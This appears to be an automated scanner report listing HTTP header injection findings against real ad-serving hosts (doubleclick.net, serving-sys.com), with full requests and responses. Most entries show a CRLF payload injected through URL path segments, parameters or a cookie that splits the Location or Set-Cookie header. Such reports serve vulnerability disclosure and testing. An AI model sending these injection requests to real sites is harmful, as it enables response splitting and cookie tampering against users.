2.2. http://ad.doubleclick.net/activity [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/activity

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload fba57%0d%0a1bd6f7ca3f9 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?&fba57%0d%0a1bd6f7ca3f9=1 HTTP/1.1
Accept: */*
Referer: http://www.diamondconsultants.com/publicsite/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ad.doubleclick.net/activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?&fba57
1bd6f7ca3f9=1&_dc_ck=try:
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 12 Jan 2011 03:19:19 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 12 Jan 2011 03:04:19 GMT
Server: GFE/2.0
Content-Type: text/html

2.3. http://ad.doubleclick.net/activity [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/activity

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 7bb44%0d%0a6d1fe61d04d was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?7bb44%0d%0a6d1fe61d04d HTTP/1.1
Accept: */*
Referer: http://www.diamondconsultants.com/publicsite/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ad.doubleclick.net/activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?7bb44
6d1fe61d04d&_dc_ck=try:
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 12 Jan 2011 03:19:03 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 12 Jan 2011 03:04:03 GMT
Server: GFE/2.0
Content-Type: text/html

2.4. http://ad.doubleclick.net/ad/wiredcom.dart/threatlevel [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/wiredcom.dart/threatlevel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2d140%0d%0a9de548d54f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2d140%0d%0a9de548d54f/wiredcom.dart/threatlevel;kw=threatlevel;kw=blogs;kw=bottom;tile=5;sz=728x90;ord=123456789? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2d140
9de548d54f/wiredcom.dart/threatlevel%3Bkw%3Dthreatlevel%3Bkw%3Dblogs%3Bkw%3Dbottom%3Btile%3D5%3Bsz%3D728x90%3Bord%3D123456789:
Date: Wed, 12 Jan 2011 03:26:57 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/wiredcom.dart/threatlevel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 28b5e%0d%0af9bfe52e968 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /28b5e%0d%0af9bfe52e968/wiredcom.dart/threatlevel;sz=728x90;tile=1;dcopt=ist;kw=01;kw=2011;kw=blogs;kw=threatlevel;kw=top;kw=wikileaks-sunken-treasure;!c=top;ord=3553839230444282.5; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/28b5e
f9bfe52e968/wiredcom.dart/threatlevel%3Bsz%3D728x90%3Btile%3D1%3Bdcopt%3Dist%3Bkw%3D01%3Bkw%3D2011%3Bkw%3Dblogs%3Bkw%3Dthreatlevel%3Bkw%3Dtop%3Bkw%3Dwikileaks-sunken-treasure%3B%21c%3Dtop%3Bord%3D3553839230444282.5%3B:
Date: Wed, 12 Jan 2011 03:03:12 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/wiredcom.dart/threatlevel

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7c041%0d%0a26bb86d7910 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7c041%0d%0a26bb86d7910/wiredcom.dart/threatlevel;kw=threatlevel;kw=blogs;kw=bottom;tile=5;sz=728x90;ord=123456789? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7c041
26bb86d7910/wiredcom.dart/threatlevel%3Bkw%3Dthreatlevel%3Bkw%3Dblogs%3Bkw%3Dbottom%3Btile%3D5%3Bsz%3D728x90%3Bord%3D123456789:
Date: Wed, 12 Jan 2011 03:26:56 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.uk.doubleclick.net/ad/reg.misc.4159/textlink [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.uk.doubleclick.net
Path:	/ad/reg.misc.4159/textlink

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 14c3a%0d%0adfa9ca18363 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /14c3a%0d%0adfa9ca18363/reg.misc.4159/textlink;dcove=d;tlid=222964969;sz=1x1;ord=TSovV8CoATgAAEs2Y5YAAAGD? HTTP/1.1
Host: ad.uk.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/14c3a
dfa9ca18363/reg.misc.4159/textlink%3Bdcove%3Dd%3Btlid%3D222964969%3Bsz%3D1x1%3Bord%3DTSovV8CoATgAAEs2Y5YAAAGD:
Date: Wed, 12 Jan 2011 03:23:01 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.uk.doubleclick.net/adj/reg.misc.4159/textlink [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.uk.doubleclick.net
Path:	/adj/reg.misc.4159/textlink

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 645ec%0d%0a4b755942ebf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /645ec%0d%0a4b755942ebf/reg.misc.4159/textlink;dcove=d;tlid=222964969;sz=1x1;ord=TSovV8CoATgAAEs2Y5YAAAGD? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/645ec
4b755942ebf/reg.misc.4159/textlink%3Bdcove%3Dd%3Btlid%3D222964969%3Bsz%3D1x1%3Bord%3DTSovV8CoATgAAEs2Y5YAAAGD:
Date: Wed, 12 Jan 2011 03:03:22 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.9. http://ad.uk.doubleclick.net/adj/reg.security.4159/front [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.uk.doubleclick.net
Path:	/adj/reg.security.4159/front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6ff1d%0d%0af780d4232ac was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6ff1d%0d%0af780d4232ac/reg.security.4159/front;tile=1;dcove=d;cta=0;ctb=0;ctc=redesign;sc=1;cid=;test=;pid=111484;pf=0;kw=open%20source;kw=encryption;kw=cryptography;kw=software;kw=export%20administration%20regulations;kw=bureau%20of%20industry%20and%20security;cp=0;vc=sec.front;pos=top;dcopt=ist;sz=728x90;ord=671761913? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6ff1d
f780d4232ac/reg.security.4159/front%3Btile%3D1%3Bdcove%3Dd%3Bcta%3D0%3Bctb%3D0%3Bctc%3Dredesign%3Bsc%3D1%3Bcid%3D%3Btest%3D%3Bpid%3D111484%3Bpf%3D0%3Bkw%3Dopen%20source%3Bkw%3Dencryption%3Bkw%3Dcryptography%3Bkw%3Dsoftware%3Bkw%3Dexport%20administration%20regulations%3Bkw%3Dbureau%20of%20industry%20and%20security%3Bcp%3D0%3Bvc%3Dsec.front%3Bpos%3Dtop%3Bdcopt%3Dist%3Bsz%3D728x90%3Bord%3D67176:
Date: Wed, 12 Jan 2011 03:03:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.10. http://ad.uk.doubleclick.net/imp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.uk.doubleclick.net
Path:	/imp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 39898%0d%0a43e3dfa8798 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /39898%0d%0a43e3dfa8798;v7;j;233879919;0-0;0;13500656;0/0;39869669/39887456/1;;~okv=;tile=1;dcove=d;cta=0;ctb=0;ctc=redesign;sc=1;cid=;test=;pid=111484;pf=0;kw=open%20source;kw=encryption;kw=cryptography;kw=software;kw=export%20administration%20regulations;kw=bureau%20of%20industry%20and%20security;cp=0;vc=sec.front;pos=top;dcopt=ist;sz=728x90;~cs=s%3fhttp://regmedia.co.uk/2007/09/13/tp.gif HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/39898
43e3dfa8798;v7;j;233879919;0-0;0;13500656;0/0;39869669/39887456/1%3B%3B%7Eokv%3D%3Btile%3D1%3Bdcove%3Dd%3Bcta%3D0%3Bctb%3D0%3Bctc%3Dredesign%3Bsc%3D1%3Bcid%3D%3Btest%3D%3Bpid%3D111484%3Bpf%3D0%3Bkw%3Dopen%20source%3Bkw%3Dencryption%3Bkw%3Dcryptography%3Bkw%3Dsoftware%3Bkw%3Dexport%20administration%20regulations%3Bkw%3Dbureau%20of%20industry%20and%20security%3Bcp%3D0%3Bvc%3Dsec.front%3B:
Date: Wed, 12 Jan 2011 03:03:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.11. http://ad.uk.doubleclick.net/jump/reg.misc.4159/textlink [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.uk.doubleclick.net
Path:	/jump/reg.misc.4159/textlink

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7941d%0d%0a560604139b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7941d%0d%0a560604139b0/reg.misc.4159/textlink HTTP/1.1
Host: ad.uk.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7941d
560604139b0/reg.misc.4159/textlink:
Date: Wed, 12 Jan 2011 03:22:20 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.12. http://ad.uk.doubleclick.net/jump/reg.security.4159/front [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.uk.doubleclick.net
Path:	/jump/reg.security.4159/front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 82d2a%0d%0a2431e9af5a3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /82d2a%0d%0a2431e9af5a3/reg.security.4159/front;tile=1;pos=top;dcove=d;sz=728x90;ord=TSovV8CoATgAAEs2Y5YAAAGD? HTTP/1.1
Host: ad.uk.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/82d2a
2431e9af5a3/reg.security.4159/front%3Btile%3D1%3Bpos%3Dtop%3Bdcove%3Dd%3Bsz%3D728x90%3Bord%3DTSovV8CoATgAAEs2Y5YAAAGD:
Date: Wed, 12 Jan 2011 03:22:51 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.13. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerRedirect.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 56821%0d%0aee102f7460c was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=056821%0d%0aee102f7460c; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=056821
ee102f7460c; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:20:07 GMT
Connection: close

2.14. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload f3a55%0d%0a27a427f88d was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=1922091&Page=&PluID=0&Pos=8865\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0f3a55%0d%0a27a427f88d; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-281/Type-0/7b4b3e72-c3e8-4733-aa25-3c5dffe10972.gif
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0f3a55
27a427f88d; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=fUFGa5O+02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7lgH0820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uP4820wsI000w000_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uP402HA820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsG02WGg410sI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_8865\=4164202
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:22:56 GMT
Connection: close

2.15. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 8d759%0d%0a51104ebddf5 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=08d759%0d%0a51104ebddf5; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=08d759
51104ebddf5; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:21:00 GMT
Connection: close

2.16. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload c4033%0d%0acf86744927b was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4164202%7E%7E0%5EebAdDuration%7E18%7E0%7E1%7E0%7E2%7E0%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.9409657982178032&flv=c4033%0d%0acf86744927b&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Origin: http://www.theregister.co.uk
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=7c038cd2-da51-45cb-9ace-ed6278dfd0773G9010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=7c038cd2-da51-45cb-9ace-ed6278dfd0773G9010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=c4033
cf86744927b&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:26 GMT
Connection: close
Content-Length: 0

2.17. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 760e7%0d%0abee3cb0b4fa was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4164202%7E%7E0%5EebAdDuration%7E18%7E0%7E1%7E0%7E2%7E0%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.9409657982178032&flv=10.1103&wmpv=0&res=760e7%0d%0abee3cb0b4fa HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Origin: http://www.theregister.co.uk
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=aafc6ac3-c8d9-475e-94e2-b0ca1f5b4cee3G9010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=aafc6ac3-c8d9-475e-94e2-b0ca1f5b4cee3G9010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=760e7
bee3cb0b4fa&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:27 GMT
Connection: close
Content-Length: 0

2.18. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 74b8f%0d%0a8312f755b94 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4164202%7E%7E0%5EebAdDuration%7E18%7E0%7E1%7E0%7E2%7E0%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.9409657982178032&flv=10.1103&wmpv=74b8f%0d%0a8312f755b94&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Origin: http://www.theregister.co.uk
Accept: */*
